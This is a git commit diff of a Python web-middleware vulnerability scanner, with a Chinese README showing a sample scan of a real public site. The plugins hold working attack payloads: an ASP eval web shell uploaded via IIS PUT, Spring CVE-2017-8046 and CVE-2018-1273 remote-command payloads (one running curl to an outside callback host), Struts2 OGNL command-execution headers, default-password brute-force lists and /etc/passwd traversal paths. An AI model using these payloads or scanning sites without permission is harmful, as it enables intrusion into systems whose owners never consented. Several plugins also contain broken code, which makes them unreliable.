complete

2019-03-30 23:03:09 +08:00
parent 905931df7c
commit ca723d669c
63 changed files with 2218 additions and 86 deletions
--- a/N-MiddlewareScan.py
+++ b/N-MiddlewareScan.py
@@ -11,16 +11,16 @@ from concurrent.futures import ThreadPoolExecutor
 from plugins import plugins
 #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080
 class MiddlewareScan(object):
-    def __init__(self,url,options):
+    def __init__(self,arg,ThreadNum):
-        self.url=url
+        self.arg=arg
-        self.options=options
+        self.ThreadNum=ThreadNum
    def run(self):
-        P = plugins.plugins(self.url,self.options)
+        P = plugins.plugins(self.arg,self.ThreadNum)
        P.run()
 def main():
    arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete')
    arg.add_argument('-u', '--url', help='url site', dest='url')
-    arg.add_argument('-i', '--file', help='file name', dest='file')
+    arg.add_argument('-i', '--file', help='file name , fill url ', dest='file')
    arg.add_argument('-p', '--options', help='options', dest='options')
    arg.add_argument('-t', '--thread', help='thread num', dest='thread')
    arg = arg.parse_args()
@@ -30,7 +30,7 @@ def main():
        arg.options="all"
    if arg.url:
        try:
-            S=MiddlewareScan(arg.url,arg.options)
+            S=MiddlewareScan(arg,config)
            S.run()
        except Exception:
            print(traceback.print_exc())
@@ -41,14 +41,14 @@ def main():
                    for url in f.readlines():
                        try:
                            url=url.rstrip("\n")
-                            S=MiddlewareScan(url,arg.options)
+                            S=MiddlewareScan(arg,config)
                            excetor.submit(S.run())
                        except Exception:
                            pass
            f.close()
        except Exception:
            print(traceback.print_exc())
-    print("相关漏洞检测完成。")
+    print("\n\n相关漏洞检测完成。")
 if __name__ == '__main__':
    print("开始检测中间件相关漏洞:")
 main()
--- a/README.md
+++ b/README.md
@@ -1,5 +1,135 @@
 1.  
 最近在看web中间件的漏洞  
 看到一个三年前的脚本：https://github.com/ywolf/F-MiddlewareScan  
 想着自己写一个中间件相关的，正是脚本好写，poc和exp难  
 github链接：https://github.com/nihaohello/N-MiddlewareScan  
 2.  
 #plugins vuln poc exp  
 主要是下面模块：  
 1.axis  
 xss  弱密码  
 2.glashfish  
 3.jboss  
 4.resin  
 5.weblogic  
 6.tomcat  
 7.struts2  
 8.IIS  
 9.fastcgi  
 10.phpcgi  
 11.apache  
 12.nginx  
 13.spring mvc  
 借用和拉用了（有些也许没有写到）：  
 axis，glassfish，nginx，iis：  
 https://github.com/rabbitmask/WeblogicR  
 jboss:  
 https://github.com/search?l=Python&q=jboss&type=Repositories  
 https://github.com/SkewwG/VulScan/blob/master/Jboss/CVE-2017-12149.py  
 weblogic:  
 https://github.com/search?l=Python&q=weblogic&type=Repositories  
 https://www.exploit-db.com/  :有poc  
 https://nvd.nist.gov/vuln/detail/CVE-2017-10271  
 https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html  
 https://github.com/rabbitmask/WeblogicR    poc来自这  
 https://github.com/kingkaki/weblogic-scan  
 tomcat:  
 https://github.com/search?l=Python&q=tomcat&type=Repositories  
 https://github.com/SkewwG/VulScan  
 struts2:  
 https://github.com/search?l=Python&q=struts2&type=Repositories  
 spring：  
 http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=spring  
 https://www.exploit-db.com/  18年  
 3.  
 测试例子：  
 python N-MiddlewareScan.py -u https://www.baidu.com  
 第一部分standard_poc 测试开始:  
 ***********************  
 https://www.baidu.com  CVE_2018_10661 测试结束  
 https://www.baidu.com/axis2/axis2-web/HappyAxis.jsp信息扫描完成  
 https://www.baidu.com/axis2/axis2-admin/login弱口令扫描完成  
 https://www.baidu.com/j_security_check?loginButton=Login 测试结束  
 https://www.baidu.com  exist Directory_traversal vuln 测试结束  
 https://www.baidu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成  
 https://www.baidu.com/web-console/Invoker 扫描完成  
 https://www.baidu.com/invoker/JMXInvokerServlet 扫描完成  
 https://www.baidu.com/admin-console/ 扫描完成  
 https://www.baidu.com/resin-admin/j_security_check?j_uri=index.php扫描完成  
 https://www.baidu.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成  
 https://www.baidu.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成  
 https://www.baidu.com/%20..\web-inf扫描完成  
 https://www.baidu.com/%3f.jsp扫描完成  
 https://www.baidu.com/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成  
 第一部分 standard_poc 没有测试出任何的漏洞。  
 第二部分：  
 开始测试特定的poc脚本：  
 ***********************  
 对tomcat weak password 进行检测  
 CVE_2015_4852 脚本出错  
 CVE_2016_0638 脚本出错  
 CVE_2016_3510 脚本出错  
 CVE_2017_3248 脚本出错  
 [-]目标weblogic未检测到CVE-2017-3506  
 CVE_2018_2893 脚本出错  
 CVE_2018_2628 脚本出错  
 managerURL200 脚本出错  
 uddi_ssrf 脚本出错  
 CVE_2017_12149 检测函数出错  
 https://www.baidu.com  
 [36mCode by Lucifer.[0m  
 [36m-------检测struts2漏洞--------  
 目标url:https://www.baidu.com[0m  
 [32m目标不存在struts2-005漏洞..[0m  
 [32m目标不存在struts2-009漏洞..[0m  
 [32m目标不存在struts2-013漏洞..[0m  
 [36m检测struts2-016超时..[0m  
 超时原因:  HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6)  
 [32m目标不存在struts2-019漏洞..[0m  
 [36m检测struts2-devmode超时..[0m  
 超时原因:  HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6)  
 [32m目标不存在struts2-032漏洞..[0m  
 [32m目标不存在struts2-033漏洞..[0m  
 [32m目标不存在struts2-037漏洞..[0m  
 [32m目标不存在struts2-045漏洞..[0m  
 [32m目标不存在struts2-046漏洞..[0m  
 [32m目标不存在struts2-048漏洞..[0m  
 [32m目标不存在struts2-020漏洞..[0m  
 [32m目标不存在struts2-052漏洞..[0m  
 [32m目标不存在struts2-053漏洞..[0m  
 [32m目标不存在struts2-057漏洞..(只提供检测)[0m  
 [-]不存在SpringCVE-2017-8046漏洞!  
 [-] https://www.baidu.com 不存在IIS PUT上传  
 Server 不存在 IIS shortname vulnerable  
 Server 不存在 IIS shortname vulnerable  
 [-]不存在Nginx越界读取缓存漏洞（CVE-2017-7529）漏洞...(低危)  
 相关漏洞检测完成。  
--- a/pycache/config.cpython-37.pyc
+++ b/pycache/config.cpython-37.pyc
--- a/_update.py
+++ b/_update.py
--- a/config.py
+++ b/config.py
@@ -1 +1,21 @@
 ThreadNum=50
 Timeout=6
 port=80
 #linux
 '''
 RED = '\x1b[91m'
 RED1 = '\033[31m'
 BLUE = '\033[94m'
 GREEN = '\033[32m'
 BOLD = '\033[1m'
 NORMAL = '\033[0m'
 ENDC = '\033[0m'
 '''
 RED = '\033[31m'       # 红色
 GREEN = '\033[32m'     # 绿色
 YELLOW = '\033[33m'    # 黄色
 BLUE = '\033[34m'      # 蓝色
 FUCHSIA = '\033[35m'   # 紫红色
 CYAN = '\033[36m'      # 青蓝色
 WHITE = '\033[37m'     # 白色
--- a/old_plugins/axis.py
+++ b/old_plugins/axis.py
@@ -20,8 +20,8 @@ def axis_admin(host):
        error_i = 0
        flag_list = ['Administration Page</title>', 'System Components', 'axis2-admin/upload',
                     'include page="footer.inc">', 'axis2-admin/logout']
-        user_list = ['axis', 'admin', 'manager', 'root']
+        user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root']
-        pass_list = ['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',
+        pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',
                     'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root']
        for user in user_list:
            for password in pass_list:
@@ -31,14 +31,14 @@ def axis_admin(host):
                    request = requests.post(url=login_url, data=PostStr, headers=headers)
                    res_html = res.text
                except Exception:
-                    return 'axis no weak password。'
+                    return 'axis_plugin_catalog no weak password。'
                for flag in flag_list:
                    if flag in res_html:
                        info = '%s Axis Weak password %s:%s' % (login_url, user, password)
                        return 'YES|' + info
-        return 'axis no weak password。'
+        return 'axis_plugin_catalog no weak password。'
    except Exception:
-        return 'axis no weak password。'
+        return 'axis_plugin_catalog no weak password。'
 def axis_info(host):
    try:
@@ -49,13 +49,13 @@ def axis_info(host):
            s = requests.get(url=url, headers=headers)
            res_html = s.text
        except Exception:
-            return 'no axis info。'
+            return 'no axis_plugin_catalog info。'
        if "Axis2 Happiness Page" in res_html:
            info = vul_url + " Axis Information Disclosure"
            return 'YES|' + info
-        return 'no axis info。'
+        return 'no axis_plugin_catalog info。'
    except Exception:
-        return 'no axis info。'
+        return 'no axis_plugin_catalog info。'
 def axis(url):
    cve__2018_10661=CVE_2018_10661(url)
    print(cve__2018_10661)
--- a/plugins/IIS_special_plugin_.py
+++ b/plugins/IIS_special_plugin_.py
@@ -0,0 +1,42 @@
 #coding=utf-8
 import requests
 import sys
 import http.client
 import urllib.parse
 import threading
 import queue
 import time
 def IIS_PUT(arg,config):
    try:
        url = arg.url
        data = '<%eval request("1111111111")%>'
        res = requests.put(url=url, data=data, timeout=5)
        html_text = requests.get(url).text
        if '<%eval request("1111111111")%>' in html_text:
            print(('[+] {} 存在IIS PUT上传'.format(url)))
            requests.delete(url)
            print(('[+] {} 成功删除测试文件'.format(url)))
        else:
            print(('[-] {} 不存在IIS PUT上传'.format(url)))
    except Exception as e:
        print(e)
 def IIS_shortname_Scanner(url):
    try:
        for _method in ['GET', 'OPTIONS']:
            if _method == 'GET':
                status_1 = requests.get(url+ '/*~1*/a.aspx')  # an existed file/folder
                status_2 = requests.get(url + '/l1j1e*~1*/a.aspx')  # not existed file/folder
            else:
                status_1 = requests.options(url + '/*~1*/a.aspx')  # an existed file/folder
                status_2 = requests.options(url + '/l1j1e*~1*/a.aspx')  # not existed file/folder
            if status_1.status_code == 404 and status_2.status_code != 404:
                print("Server 存在 IIS shortname vulnerable")
            else:
                print("Server 不存在 IIS shortname vulnerable")
        return False
    except Exception as e:
        raise Exception('[is_vul.Exception] %s' % str(e))
 def IIS_special_plugin_(arg,config):
    IIS_PUT(arg,config)
    IIS_shortname_Scanner(arg.url)
--- a/plugins/Nginx_special_plugin_.py
+++ b/plugins/Nginx_special_plugin_.py
@@ -0,0 +1,30 @@
 #coding=utf-8
 # Nginx信息泄露！python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png
 # 敏感信息有KEY等等
 import requests
 from termcolor import cprint
 class NginxCVE_2017_7529():
    def attack(self, url):
        #url = r'http://207.246.80.61:8000/'
        try:
            a = requests.get(url)
            start = int(a.headers['Content-Length']) + 300
            end = 0x8000000000000000 - start
            headers = {
                "Range": "bytes=-{},-{}".format(start, end)
            }
            res = requests.get(url=url, headers=headers, stream=True, timeout=10)
            ret = res.raw.read(500)
            code = res.status_code
            if code == 206:
                print( "[+]存在Nginx越界读取缓存漏洞（CVE-2017-7529）漏洞...(低危)")
            else:
                print("[-]不存在Nginx越界读取缓存漏洞（CVE-2017-7529）漏洞...(低危)")
        except Exception as e:
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
 def Nginx_special_plugin_(arg,config):
    NginxCVE_2017_7529().attack(arg.url)
--- a/plugins/pycache/IIS_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/IIS_special_plugin_.cpython-37.pyc
--- a/plugins/pycache/Nginx_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/Nginx_special_plugin_.cpython-37.pyc
--- a/plugins/pycache/axis_plugin.cpython-37.pyc
+++ b/plugins/pycache/axis_plugin.cpython-37.pyc
--- a/plugins/pycache/jboss_plugin.cpython-37.pyc
+++ b/plugins/pycache/jboss_plugin.cpython-37.pyc
--- a/plugins/pycache/jboss_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/jboss_special_plugin_.cpython-37.pyc
--- a/plugins/pycache/plugins.cpython-37.pyc
+++ b/plugins/pycache/plugins.cpython-37.pyc
--- a/plugins/pycache/resin_plugin.cpython-37.pyc
+++ b/plugins/pycache/resin_plugin.cpython-37.pyc
--- a/plugins/pycache/special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/special_plugin_.cpython-37.pyc
--- a/plugins/pycache/spring_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/spring_special_plugin_.cpython-37.pyc
--- a/plugins/pycache/struts2_plugin.cpython-37.pyc
+++ b/plugins/pycache/struts2_plugin.cpython-37.pyc
--- a/plugins/pycache/struts2_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/struts2_special_plugin_.cpython-37.pyc
--- a/plugins/pycache/tomcat_plugin.cpython-37.pyc
+++ b/plugins/pycache/tomcat_plugin.cpython-37.pyc
--- a/plugins/pycache/tomcat_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/tomcat_special_plugin_.cpython-37.pyc
--- a/plugins/pycache/user_agent.cpython-37.pyc
+++ b/plugins/pycache/user_agent.cpython-37.pyc
--- a/plugins/pycache/weblogic_plugin.cpython-37.pyc
+++ b/plugins/pycache/weblogic_plugin.cpython-37.pyc
--- a/plugins/pycache/weblogic_special_plugin_.cpython-37.pyc
+++ b/plugins/pycache/weblogic_special_plugin_.cpython-37.pyc
--- a/plugins/axis_plugin.py
+++ b/plugins/axis_plugin.py
@@ -33,7 +33,7 @@ pocs=[
     "fail":"/axis2/axis2-admin/login不存在弱口令",
     "end":"/axis2/axis2-admin/login弱口令扫描完成",
     "admin_bursk":"True",
-     "username":['axis', 'admin', 'manager', 'root'],
+     "username":['axis_plugin_catalog', 'admin', 'manager', 'root'],
-     "password":['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',                'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'],
+     "password":['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888',                'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'],
     },
 ]
--- a/plugins/jboss_plugin.py
+++ b/plugins/jboss_plugin.py
@@ -0,0 +1,53 @@
 #coding=utf-8
 pocs=[
    {"requests_option":"GET",
     "url":["/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"],
     "params":[],
     "data":[],
     "flag":[],
     "success":"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
     "fail":"",
     "end":"/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
    {"requests_option":"GET",
     "url":["/web-console/Invoker"],
     "params":[],
     "data":[],
     "flag":[],
     "success":"/web-console/Invoker",
     "fail":"",
     "end":"/web-console/Invoker 扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
    {"requests_option":"GET",
     "url":["/invoker/JMXInvokerServlet"],
     "params":[],
     "data":[],
     "flag":[],
     "success":"/invoker/JMXInvokerServlet",
     "fail":"",
     "end":"/invoker/JMXInvokerServlet 扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
    {"requests_option":"GET",
     "url":["/admin-console/"],
     "params":[],
     "data":[],
     "flag":[],
     "success":"/admin-console/",
     "fail":"",
     "end":"/admin-console/ 扫描完成",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
 ]
--- a/plugins/jboss_special_plugin_.py
+++ b/plugins/jboss_special_plugin_.py
@@ -0,0 +1,23 @@
 #coding=utf-8
 import requests
 import sys
 import socket
 def CVE_2017_12149(arg,config):
    try:
        port = 8080
        ip = socket.gethostbyname(arg.url.strip("http://").strip("https://"))
        url = 'http://{}:{}/invoker/JMXInvokerServlet'.format(ip, port)
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
        r = requests.get(
            url, headers=headers, timeout=10, allow_redirects=False)
        if r.status_code == 200:
            if r.headers['content-type'].count('serialized') or r.headers['Content-Type'].count('serialized'):
                print('[ok] -> {}:{}'.format(ip, port))
            else:
                print("不存在 CVE_2017_12149 反序列化漏洞")
    except Exception:
        print("CVE_2017_12149 检测函数出错")
 def jboss_special_plugin_(arg,config):
    CVE_2017_12149(arg,config)
--- a/plugins/plugins.py
+++ b/plugins/plugins.py
@@ -4,73 +4,127 @@ import requests
 import os
 import json
 import traceback
 from concurrent.futures import ThreadPoolExecutor
 from plugins.special_plugin_ import special_plugin_
 sys.path.append("plugins")
 import plugins
 current_file=os.path.dirname(os.path.abspath(__file__))
 from user_agent import get_user_agent
 class plugins(object):
-    def __init__(self,url,options):
+    def __init__(self,arg,config):
-        self.url=url
+        self.arg=arg
-        self.options=options
+        self.config=config
        self.url=arg.url
        self.options=arg.options
        self.ThreadNum=config.ThreadNum
        self.Timeout=config.Timeout
        self.vuln=[]
        self.port=config.port
    def run(self):
        print("\n第一部分standard_poc 测试开始:")
        print("***********************")
        files=os.listdir(current_file)
-        for file in files:
+        list_8080=["axis","glassfish","jboss","resin","spring","tomcat","struts2"]
-            if "_plugin.py" in file:
+        with ThreadPoolExecutor(self.ThreadNum) as excetor:
-                module=file.rstrip(".py")
+            for file in files:
-                pocs=__import__(module).pocs
+                if "_plugin.py" in file:
-                self.check(pocs)
+                    module = file.rstrip(".py")
                    pocs = __import__(module).pocs
                    module=module.strip("_plugin")
                    if module in list_8080:
                        self.port=8080
                    if module in ["weblogic"]:
                        self.port=7001
                    excetor.submit(self.check(pocs))
        if self.vuln:
            print("\n\n\n第一部分 standard_poc 测试出的漏洞有：")
            for vuln in self.vuln:
                print(vuln)
        else:
            print("\n\n\n第一部分 standard_poc 没有测试出任何的漏洞。")
        print("\n\n\n第二部分：\n开始测试特定的poc脚本：")
        print("***********************")
        special_plugin_(self.arg,self.config)
    def request_get(self,url,params,data,flags,success_num,success,fail,pocs):
        try:
            headers = get_user_agent()
            s = requests.get(url=url+":"+self.port, params=params, headers=headers,timeout=self.Timeout)
            if not flags:
                if s.status_code!=404:
                    self.vuln.append(self.url+success)
            for flag in flags:
                if flag in s.text:
                    success_num = success_num + 1
            if success_num > 0:
                self.vuln.append(success + " \npocs: \n" + pocs)
                print(success + " \npocs: \n" + pocs)
        except Exception:
            success_num=success_num+1
            if success_num<=2:
                self.request_get(url, params, data, flags, success_num,success,fail,pocs)
    def request_post(self,url,params,data,flag,success_num,username,password,success,fail,pocs):
        try:
            headers = {'User-Agent': get_user_agent()}
            s = requests.post(url=url+":"+self.port, data=data, headers=headers,timeout=self.Timeout)
            for flag in poc["flag"]:
                if flag in s.text:
                    success_num = success_num + 1
            if success_num > 0:
                if pocs["admin_bursk"]==True:
                    self.vuln.append("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password))
                    print("success url:" + utl + " " + success + ",username:%s password:%s" % (username, password))
                else:
                    self.vuln.append(success + " \n pocs: \n" + pocs)
                    print(success + " \n pocs: \n" + pocs)
        except Exception:
            success_num=success_num+1
            if success_num<=2:
                self.request_post(url,params,data,flag,success_num,username,password,success,fail,pocs)
    def check(self,pocs):
-        for poc in pocs:
+        with ThreadPoolExecutor(self.ThreadNum) as excetor:
-            for url in poc["url"]:
+            for poc in pocs:
-                try:
+                for url in poc["url"]:
-                    success_num = 0
+                    try:
-                    url = self.url + url
+                        url = self.url + url
-                    if poc["requests_option"] == "GET":
+                        if poc["requests_option"] == "GET":
-                        if not poc["params"]:
+                            if not poc["params"]:
-                            poc["params"].append("seize")
+                                poc["params"].append("seize")
-                        for params in poc["params"]:
+                            for params in poc["params"]:
-                            success_num=0
+                                success_num = 0
                            try:
                                headers = {'User-Agent': get_user_agent()}
                                s = requests.get(url=url, params=params, headers=headers)
                                for flag in poc["flag"]:
                                    if flag in s.text:
                                        success_num = success_num + 1
                                if success_num > 0:
                                    print(poc["success"]+" , url: "+url)
                            except Exception:
                                print(traceback.print_exc())
                    if poc["requests_option"] == "POST":
                        if not poc["data"]:
                            poc["data"].append("seize")
                        for data in poc["data"]:
                            try:
                                if poc["admin_bursk"] == "True":
                                    for username in poc["username"]:
                                        for password in poc["password"]:
                                            success_num=0
                                            headers = {'User-Agent': get_user_agent()}
                                            s = requests.post(url=url, data=data, headers=headers)
                                            for flag in poc["flag"]:
                                                if flag in s.text:
                                                    success_num = success_num + 1
                                            if success_num > 0:
                                                print("success url:"+utl+" "+poc["success"] + ",username:%s password:%s" % (username, password))
                            except Exception:
                                print(traceback.print_exc())
                            else:
                                try:
-                                    for data in poc["data"]:
+                                    excetor.submit(self.request_get(url, params, poc["data"], poc["flag"], success_num, poc["success"],poc["fail"],poc))
                                        success_num=0
                                        headers = {'User-Agent': get_user_agent()}
                                        s = requests.post(url=url, data=data, headers=headers)
                                        for flag in poc["flag"]:
                                            if flag in s.text:
                                                success_num = success_num + 1
                                        if success_num > 0:
                                            print("success url:" + utl + " " + poc["success"])
                                except Exception:
                                    print(traceback.print_exc())
-                except Exception:
+                        if poc["requests_option"] == "POST":
-                    print(traceback.print_exc())
+                            if not poc["data"]:
-            print(poc["end"])
+                                poc["data"].append("seize")
                            for data in poc["data"]:
                                try:
                                    if poc["admin_bursk"] == "True":
                                        for username in poc["username"]:
                                            for password in poc["password"]:
                                                success_num = 0
                                                try:
                                                    excetor.submit(self.request_post(url, poc["params"], data, poc["flag"],success_num, username, password, poc["success"],poc["fail"],poc))
                                                except Exception:
                                                    print(traceback.print_exc())
                                except Exception:
                                    print(traceback.print_exc())
                                else:
                                    success_num = 0
                                    try:
                                        for data in poc["data"]:
                                            success_num = 0
                                            try:
                                                excetor.submit(self.request_post(url, poc["params"], data, poc["flag"], success_num,poc["username"], poc["password"], poc["success"],poc["fail"],poc))
                                            except Exception:
                                                print(traceback.print_exc())
                                    except Exception:
                                        print(traceback.print_exc())
                    except Exception:
                        print(traceback.print_exc())
                if poc["end"]:
                    if "/" in poc["end"]:
                        print(self.url+poc["end"])
                    else:
                        print(self.url+"  "+poc["end"])
--- a/plugins/special_plugin_.py
+++ b/plugins/special_plugin_.py
@@ -0,0 +1,28 @@
 #coding=utf-8
 import threading
 import sys
 sys.path.append("plugin")
 from plugins.tomcat_special_plugin_ import tomcat_special_plugin_
 from plugins.weblogic_special_plugin_ import weblogic_special_plugin_
 from plugins.struts2_special_plugin_ import struts2_special_plugin_
 from plugins.jboss_special_plugin_ import jboss_special_plugin_
 from plugins.spring_special_plugin_ import spring_special_plugin_
 from plugins.IIS_special_plugin_ import IIS_special_plugin_
 from plugins.Nginx_special_plugin_ import Nginx_special_plugin_
 def special_plugin_(arg,config):
    threads=[]
    threads.append(threading.Thread(tomcat_special_plugin_(arg,config)))
    threads.append(threading.Thread(weblogic_special_plugin_(arg,config)))
    threads.append(threading.Thread(jboss_special_plugin_(arg,config)))
    threads.append(threading.Thread(struts2_special_plugin_(arg, config)))
    threads.append(threading.Thread(spring_special_plugin_(arg,config)))
    threads.append(threading.Thread(IIS_special_plugin_(arg,config)))
    threads.append(threading.Thread(Nginx_special_plugin_(arg,config)))
    for thread in threads:
        try:
            thread.start()
        except Exception as e:
            print(e)
    for t in threads:
        t.join()
--- a/plugins/spring_special_plugin_.py
+++ b/plugins/spring_special_plugin_.py
@@ -0,0 +1,64 @@
 #coding-utf-8
 # SpringCVE-2017-8046
 # 执行的命令：/usr/bin/touch ./test.jsp
 # 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112
 # 输入命令：python3 SpringCVE-2017-8046.py 207.246.80.61:8080
 import uuid
 import time
 import requests
 import json
 import sys
 def CVE_2017_8046(arg,config):
    url=arg.url
    headers1 = {"Content-Type": "application/json",
                "Cache-Control": "no-cache"}
    headers2 = {"Content-Type": "application/json-patch+json",
                "Cache-Control": "no-cache"
                }
    data1 = {"firstName": "VulApps", "lastName": "VulApps"}
    data2 = [{"op": "replace",
              "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName",
              "value": "vulapps-demo"}]
    try:
        # 利用 POST 请求添加一个数据
        url1 = r'http://{}/persons'.format(url)
        response1 = requests.post(url=url1, headers=headers1, data=json.dumps(data1))
        # 执行 POC
        url2 = r'http://{}/persons/1'.format(url)
        response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2))
        content2 = response2.text
        if 'maybe not public' in content2:
            print("[+]已在目标服务器的根目录下生成了test.jsp文件！")
    except Exception as e:
        print('[-]不存在SpringCVE-2017-8046漏洞!')
 def CVE_2018_1273(arg,config):
    try:
        key = sys.argv[1]  # Exeye_API
        target = arg.url  # 测试IP
        random_chars = str(uuid.uuid4()).split('-')[0]
        url = r'http://{}/users'.format(target)
        data = {
            'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format(
                random_chars): '',
            'password': '',
            'repeatedPassword': ''}
        requests.post(url, data)
        # 沉睡5秒，等待Exeye记录结果
        time.sleep(5)
        # 查询Exeye的结果
        url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars)
        text = requests.post(url2, data={'key': key}).text
        if random_chars in text:
            print('[+] {} exist CVE-2018-1273. [{}.gefmaezi.exeye.io]'.format(target, random_chars))
        else:
            print('[-] {} not exist'.format(target))
    except Exception as e:
        sys.exit(e.args)
 def spring_special_plugin_(arg,config):
    CVE_2017_8046(arg,config)
    #CVE_2018_1273(arg,config)
--- a/plugins/struts2_plugin.py
+++ b/plugins/struts2_plugin.py
@@ -0,0 +1,15 @@
 #coding=utf-8
 pocs=[
    {"requests_option":"",
     "url":[],
     "params":[],
     "data":[],
     "flag":[],
     "success":"",
     "fail":"",
     "end":"",
     "admin_bursk":"",
     "username":[],
     "password":[],
     },
 ]
--- a/plugins/struts2_special_plugin_.py
+++ b/plugins/struts2_special_plugin_.py
@@ -0,0 +1,458 @@
 #coding=utf-8
 #!/usr/bin/env python
 # coding=utf-8
 # code by Lucifer
 # Date 2017/10/22
 import re
 import sys
 import socket
 import base64
 import http.client
 import warnings
 import requests
 from termcolor import cprint
 from urllib.parse import urlparse
 import importlib
 warnings.filterwarnings("ignore")
 importlib.reload(sys)
 http.client.HTTPConnection._http_vsn = 10
 http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
 headers = {
    "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
    "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
    "Content-Type":"application/x-www-form-urlencoded"
 }
 headers2 = {
     "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
     "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
     "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
 }
 headers_052 = {
    "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
    "Content-Type":"application/xml"
 }
 class struts_baseverify:
    def __init__(self, url):
        self.url = url
        self.poc = {
